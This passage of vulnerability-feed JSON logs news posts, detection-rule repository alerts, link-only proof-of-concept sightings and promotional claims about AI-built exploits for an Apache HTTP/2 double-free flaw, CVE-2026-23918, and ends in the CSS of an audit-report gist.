"2026-05-09T14:04:13.894332Z"}, {"uuid": "2d6cf902-4cda-4ea6-84c6-0ba9f2aece2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mlazmdmdic2g", "content": "Apache fixes critical HTTP/2 double-free flaw CVE-2026-23918 enabling RCE\n\nApache fixed several flaws in HTTP Server, including CVE-2026-23918 (CVSS score of 8.8), a double-free bug in HTTP/2 that could allow remote code execution. The Apache Software Foundation has released updat\u2026\n#hackernews #news", "creation_timestamp": "2026-05-07T10:39:21.879818Z"}, {"uuid": "13f519ad-66db-4a2d-b854-59180e0ec142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83310", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Detections-CVE-2026-23918\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a insomnisec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 04:27:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDetection rules for CVE-2026-23918 Apache http2 RCE - Credit: stringa.ai, isec.pl\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T05:00:04.000000Z"}, {"uuid": "b3c071a2-b835-4163-b89c-f4823295eba1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mld7tjjm6n32", "content": "CVE-2026-23918: Apache HTTP/2 Double-Free Vulnerability with Possible RCE CVE-2026-23918 is a high-severity Apache HTTP/2 double-free flaw affecting version 2.4.66. Learn the root cause, who's ...\n\n#Security #Bulletin #Apache #HTTP #Server #CVE-2026-23918 #RCE\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-08T07:36:12.863071Z"}, {"uuid": "30f64da7-c6f4-436b-90ac-0e887263024a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/9hUmSN7ug2EVEMoe54drMVTAFxceMDTI0JA9Kzj6srBhh7g", "content": "", "creation_timestamp": "2026-05-08T09:00:04.000000Z"}, {"uuid": "38f587ce-9eba-47da-9fe0-2c1da0cba9f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/TOBO1j4X53-mWPhUjqfqsPILi5P8C_iHzeNGcih4hj7jhkY", "content": "", "creation_timestamp": "2026-05-05T15:00:07.000000Z"}, {"uuid": "4abf895b-a732-4e3a-923a-525947c85019", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/dsiEA15uidVU6KDez4EkzkpuPE2tuEKKJLQ-eeC4Q0mRqFk", "content": "", "creation_timestamp": "2026-05-07T09:00:04.000000Z"}, {"uuid": "c88227a4-24dc-4275-b22f-91fd25e7234d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/qLnk1n5B0PR5yjep7bbwsMJyTwvCWVIASLg9mGkcsDxA1Jk", "content": "", "creation_timestamp": "2026-05-06T21:00:04.000000Z"}, {"uuid": "a389f8ea-6238-4905-84f7-ed1e214bc605", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/nRCd-6n0pDvmfvM7KgbobBK2YcSbDsH8Dcp0n-zDwiT4HOU", "content": "", "creation_timestamp": "2026-05-06T09:00:04.000000Z"}, {"uuid": "eccaf7d9-6384-47f1-9e3a-9cb01029c1a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/yfj8_Wf1r81ZM9XH5mmBYiYd4G1zdIl6xbgawa_XXGScCdQ", "content": "", "creation_timestamp": "2026-05-05T21:00:04.000000Z"}, {"uuid": "e84a3ee7-0045-4ade-af0b-ddd5ba7710fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://www.cert.se/2026/05/cert-se-veckobrev-v19.html", "content": "", "creation_timestamp": "2026-05-08T06:10:00.000000Z"}, {"uuid": "eb232ca2-6b6c-4114-ad4b-0c180a54ffd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/codeby_sec/10102", "content": "\ud83d\udee1Apache2 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u043e\u0432\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043e\u043f\u0430\u0441\u043d\u0443\u044e \u0434\u044b\u0440\u0443 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 HTTP/2.\n\n\u27a1\ufe0f\u0418\u0437 \u043e\u0447\u0435\u043d\u044c \u0432\u0430\u0436\u043d\u043e\u0433\u043e, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-23918, \u0434\u0430\u044e\u0449\u0430\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (RCE) \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \"double-free\" \u0431\u0430\u0433\u0430.\n\u27a1\ufe0f\u0422\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-24072, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u043b\u0430 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u043b\u0430 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 Apache HTTP \u0432\u0435\u0440\u0441\u0438\u0439 2.4.66 \u0438 \u043d\u0438\u0436\u0435, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0430\u0432\u0442\u043e\u0440\u0430\u043c \u0444\u0430\u0439\u043b\u043e\u0432 .htaccess \u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u0432\u043e\u0430\u0442\u0435\u043b\u044f httpd.\n\u25b6\ufe0f\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-28780, \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043a\u0443\u0447\u0435 \u0432 \u043c\u043e\u0434\u0443\u043b\u0435 mod_proxy_ajp \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 Apache HTTP Server. \u0415\u0441\u043b\u0438 \u043c\u043e\u0434\u0443\u043b\u044c mod_proxy_ajp \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c AJP-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0432 \u043e\u0442\u0432\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 AJP-\u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0437\u0430\u043f\u0438\u0441\u0438 4 \u0431\u0430\u0439\u0442\u043e\u0432, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c, \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u043a\u0443\u0447\u0435 \u0431\u0443\u0444\u0435\u0440\u0430.\n\u25b6\ufe0f\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-29168, \u00ab\u0412\u044b\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432 \u0431\u0435\u0437 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0439 \u0438\u043b\u0438 \u0440\u0435\u0433\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f\u00bb \u0432 \u043c\u043e\u0434\u0443\u043b\u0435 mod_md \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 Apache HTTP Server, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0434\u0430\u043d\u043d\u044b\u0445 OCSP-\u043e\u0442\u0432\u0435\u0442\u043e\u0432.\n\u25b6\ufe0f\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-33006, \u0410\u0442\u0430\u043a\u0430 \u043f\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0430 \u043c\u043e\u0434\u0443\u043b\u044c mod_auth_digest \u0432 Apache HTTP Server 2.4.66 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0431\u043e\u0439\u0442\u0438 Digest-\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.\n\n\u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0437\u0434\u0435\u0441\u044c, \u043d\u043e \u043f\u0435\u0440\u0435\u0434 \u044d\u0442\u0438\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0441\u0434\u0435\u043b\u0430\u0442\u044c:\nsudo apt update && sudo apt upgrade apache2", "creation_timestamp": "2026-05-10T10:03:56.000000Z"}, {"uuid": "b5144e9f-9ba6-4ab6-8c71-186312c5ae23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/patrickcmiller.bsky.social/post/3mlczhlwmnl2a", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE thehackernews.com/2026/05/crit...", "creation_timestamp": "2026-05-08T05:42:03.029802Z"}, {"uuid": "2281b45b-999a-460d-8369-2e17526d17de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-23918", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mlelzt45bc2i", "content": "CVE-2026-23918: Apache HTTP Server HTTP/2 Double Free RCE\n\nCVE-2026-23918 is a high-severity double free vulnerability in Apache HTTP Server 2.4.66 HTTP/2 handling that can lead to RCE. Affects al...\n\n\ud83d\udd17 https://ipsec.live/blog/cve-2026-23918-apache-http2-double-free\n\n#infosec #cybersecurity", "creation_timestamp": "2026-05-08T20:47:00.240158Z"}, {"uuid": "e8306237-6b8e-4703-ad6a-4c738978e9fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/intel.overresearched.net/post/3mleq2nofu22m", "content": "\ud83d\udd34 Apache HTTP/2 RCE (CVE-2026-23918) & mod_rewrite EoP (CVE-2026-24072)\n\ud83d\udfe0 PCPJack worm evicts TeamPCP, steals creds\n\ud83d\udfe0 Akira: 38 new victims (health/mfg/edu)\nFull brief: intel.overresearched.net/2026/05/08/c...\n#Daily #ThreatIntel #InfoSec", "creation_timestamp": "2026-05-08T21:59:05.701990Z"}, {"uuid": "9612b027-8bfb-447b-9bac-ee59c3c7002a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlgfyeuzdc2y", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own in 40 minutes. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/cve-2026-239...", "creation_timestamp": "2026-05-09T14:04:14.464409Z"}, {"uuid": "ea5ae023-b8f0-4b6b-952c-4e6e5f2bf2cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlgfyga3b22y", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own in 40 minutes. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/cve-2026-239...", "creation_timestamp": "2026-05-09T14:04:15.029894Z"}, {"uuid": "f607e7a7-df13-4d01-a5fa-c83f71a28d54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlgfyhu4cc2y", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own in 40 minutes. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/cve-2026-239...", "creation_timestamp": "2026-05-09T14:04:15.589442Z"}, {"uuid": "855f8b03-7a49-4342-9e9b-c0f9180da7b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlggimoujs2s", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/exploiting-f...", "creation_timestamp": "2026-05-09T14:13:21.973991Z"}, {"uuid": "8f9241d0-0d36-43df-8516-a323165626b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlggipzqhc2s", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/exploiting-f...", "creation_timestamp": "2026-05-09T14:13:22.537154Z"}, {"uuid": "9b321909-4577-4315-a023-f76b8ecfde15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlggir24lk2s", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/exploiting-f...", "creation_timestamp": "2026-05-09T14:13:23.102622Z"}, {"uuid": "8add2383-923c-40ce-ade2-ede8b333fba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hackersidekick.com/post/3mlggise2f22s", "content": "We gave Hacker Sidekick a CVE number and it built a complete exploit development workflow on its own. Research, source diffing, Docker lab, working PoC, validation, technical report. No follow-up prompts.\n\nCVE-2026-23918 Full video and blog:\n\nhackersidekick.com/exploiting-f...", "creation_timestamp": "2026-05-09T14:13:23.654375Z"}, {"uuid": "0c287c21-2f94-4991-93ef-7c0aa8fbde47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/crustytldr.bsky.social/post/3mlgtaqta6k2g", "content": "\ud83d\udd12 Our side project: cyber-research-AI IDE, writing an exploit for CVE-2026-23918 [video]\n\nA new side project successfully developed a working exploit for CVE-2026-23918 using a cyber-resear...\n\nhttps://is.gd/FoSYT3 #CyberSecurity #InfoSec #CrustyTLDR", "creation_timestamp": "2026-05-09T18:01:28.570985Z"}, {"uuid": "560e0411-b492-4270-994c-aa0a58132211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mma6hy6oj22w", "content": "\u300cApache HTTP Server\u300d\u306b\u8907\u6570\u8106\u5f31\u6027 - \u66f4\u65b0\u3092\u547c\u3073\u304b\u3051\n\n\u300cApache HTTP Server\u300d\u306b\u8907\u6570\u306e\u8106\u5f31\u6027\u304c\u660e\u3089\u304b\u3068\u306a\u3063\u305f\u3002\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u304c\u547c\u3073\u304b\u3051\u3089\u308c\u3066\u3044\u308b\u3002\n\n\u958b\u767a\u30c1\u30fc\u30e0\u306f\u73fe\u5730\u6642\u95935\u67084\u65e5\u3001CVE\u30d9\u30fc\u30b9\u306711\u4ef6\u306e\u8106\u5f31\u6027\u3092\u660e\u3089\u304b\u306b\u3057\u3001\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u3068\u306a\u308b\u300c\u540c2.4.67\u300d\u3092\u30ea\u30ea\u30fc\u30b9\u3057\u305f\u3002\n\n\u958b\u767a\u30c1\u30fc\u30e0\u306b\u3088\u308b\u91cd\u8981\u5ea6\u306b\u304a\u3044\u3066\u30014\u6bb5\u968e\u4e2d\u3082\u3063\u3068\u3082\u9ad8\u3044\u300c\u30af\u30ea\u30c6\u30a3\u30ab\u30eb\uff08Critical\uff09\u300d\u3068\u3055\u308c\u308b\u8106\u5f31\u6027\u306f\u306a\u304f\u3001\u8106\u5f31\u6027\u300cCVE-2026-23918\u300d\u306e1\u4ef6\u306b\u95a2\u3057\u3066\u306f2\u756a\u76ee\u306b\u9ad8\u3044\u300c\u91cd\u8981\uff08Important\uff09\u300d\u3068\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0\u3055\u308c\u3066\u3044\u308b\u3002\n\n\u300cCVE-2026-23918\u300d\u306f\u3001\u300cHTT...", "creation_timestamp": "2026-05-19T19:58:59.477392Z"}, {"uuid": "478a69db-4b78-44c4-884c-0664999ccf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/keiwork35.bsky.social/post/3mlxp2nzc6r25", "content": "\u3010\u8106\u5f31\u6027\u60c5\u5831\u3011 CVE-2026-23918 Apache HTTP Server\u00a02.4.66\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\n\nApache HTTP Server\u306eHTTP/2\u30d7\u30ed\u30c8\u30b3\u30eb\u306b\u304a\u3051\u308b\u30c0\u30d6\u30eb\u30d5\u30ea\u30fc\u304a\u3088\u3073\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306e\u53ef\u80fd\u6027\u304c\u3042\u308b\u8106\u5f31\u6027\u3067\u3059\u3002", "creation_timestamp": "2026-05-16T11:02:07.854901Z"}, {"uuid": "e00885e8-be30-4ce3-8006-60ac03215886", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "published-proof-of-concept", "source": "Telegram/8zfghiqhdMgUnQpN-sW_sONu8d5R6D_u0VHsC67HR3Je1Bs", "content": "", "creation_timestamp": "2026-05-16T15:00:07.000000Z"}, {"uuid": "768cbb02-6a0f-4bd8-8231-12bc83d4272e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/GithubRedTeam/84571", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23918-Passive-Audit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a aa022\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-17 15:21:09\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPassive HTTP metadata auditor for CVE-2026-23918 exposure triage\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-17T16:00:04.000000Z"}, {"uuid": "5583c0a2-4000-4a01-b7c6-08d301c2d51b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/e8LfDRtTf8nzcOa5URmJo_p6nGHeOtUQSV0vmQsSJYMEaqg", "content": "", "creation_timestamp": "2026-05-11T21:00:05.000000Z"}, {"uuid": "3e1f7039-fa42-4130-b2d8-7f9787097bc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-23918", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116560008049573466", "content": "Schwachstellen bei Apache und n8n\nhttps://borncity.com/blog/2026/05/11/schwachstellen-in-apache-cve-2026-23918-und-n8n-cve-2026-42231/", "creation_timestamp": "2026-05-12T05:42:57.053538Z"}, {"uuid": "428d44a2-7cc8-40fa-9b53-49b5dfe29fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-2391", "type": "published-proof-of-concept", "source": "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883", "content": "", "creation_timestamp": "2026-02-12T04:39:47.000000Z"}, {"uuid": "066e27dd-e28e-42e4-8aa7-437352dc9f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "Telegram/AMxmfUF4ewnzD7lMn6F-NG7YppsQsWodDT8ioiY0udlXjVPS", "content": "", "creation_timestamp": "2026-05-21T18:44:33.000000Z"}, {"uuid": "befb67ad-a2fa-4fe0-886b-c91bb955ae02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "\n\n\n\n\n\nColumtech \u2014 Informe de Auditor\u00eda de Seguridad \u00b7 c4sh3r\n\n  :root {\n    --bg: #0b0d12;\n    --bg-2: #11151c;\n    --panel: #161b25;\n    --panel-2: #1d2330;\n    --border: #2a3142;\n    --text: #e6e9ef;\n    --text-dim: #99a2b3;\n    --accent: #ff4d6d;\n    --accent-2: #ffb86b;\n    --crit: #ff3d57;\n    --high: #ff8b3d;\n    --med:  #ffd84a;\n    --low:  #4ac6ff;\n    --info: #8c9fb0;\n    --ok: #3ddc97;\n    --code-bg: #0a0d14;\n    --mono: ui-monospace, \"JetBrains Mono\", \"Fira Code\", Menlo, Consolas, monospace;\n  }\n  * { box-sizing: border-box; }\n  html, body { margin: 0; padding: 0; background: var(--bg); color: var(--text);\n               font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n               line-height: 1.55; -webkit-font-smoothing: antialiased; }\n  a { color: var(--accent-2); text-decoration: none; }\n  a:hover { text-decoration: underline; }\n  .hero {\n    padding: 60px 40px 50px;\n    background:\n      radial-gradient(1200px 400px at 10% -10%, rgba(255,77,109,0.25), transparent 60%),\n      radial-gradient(900px 380px at 100% 0%, rgba(255,184,107,0.15), transparent 60%),\n      linear-gradient(180deg, #0e1219, #0b0d12);\n    border-bottom: 1px solid var(--border);\n  }\n  .hero-inner { max-width: 1100px; margin: 0 auto; }\n  .eyebrow {\n    display: inline-flex; align-items: center; gap: 8px;\n    font-family: var(--mono); font-size: 12px; letter-spacing: 0.15em;\n    text-transform: uppercase; color: var(--accent);\n    padding: 4px 10px; border: 1px solid rgba(255,77,109,0.35);\n    border-radius: 999px; background: rgba(255,77,109,0.08);\n  }\n  .hero h1 { font-size: 44px; line-height: 1.1; margin: 18px 0 10px; letter-spacing: -0.02em; }\n  .hero h1 .accent { color: var(--accent); }\n  .hero .sub { color: var(--text-dim); font-size: 17px; max-width: 720px; }\n  .meta { margin-top: 30px; display: grid; grid-template-columns: repeat(4, 1fr); gap: 14px; }\n  .meta .card { background: rgba(22,27,37,0.7); border: 1px solid 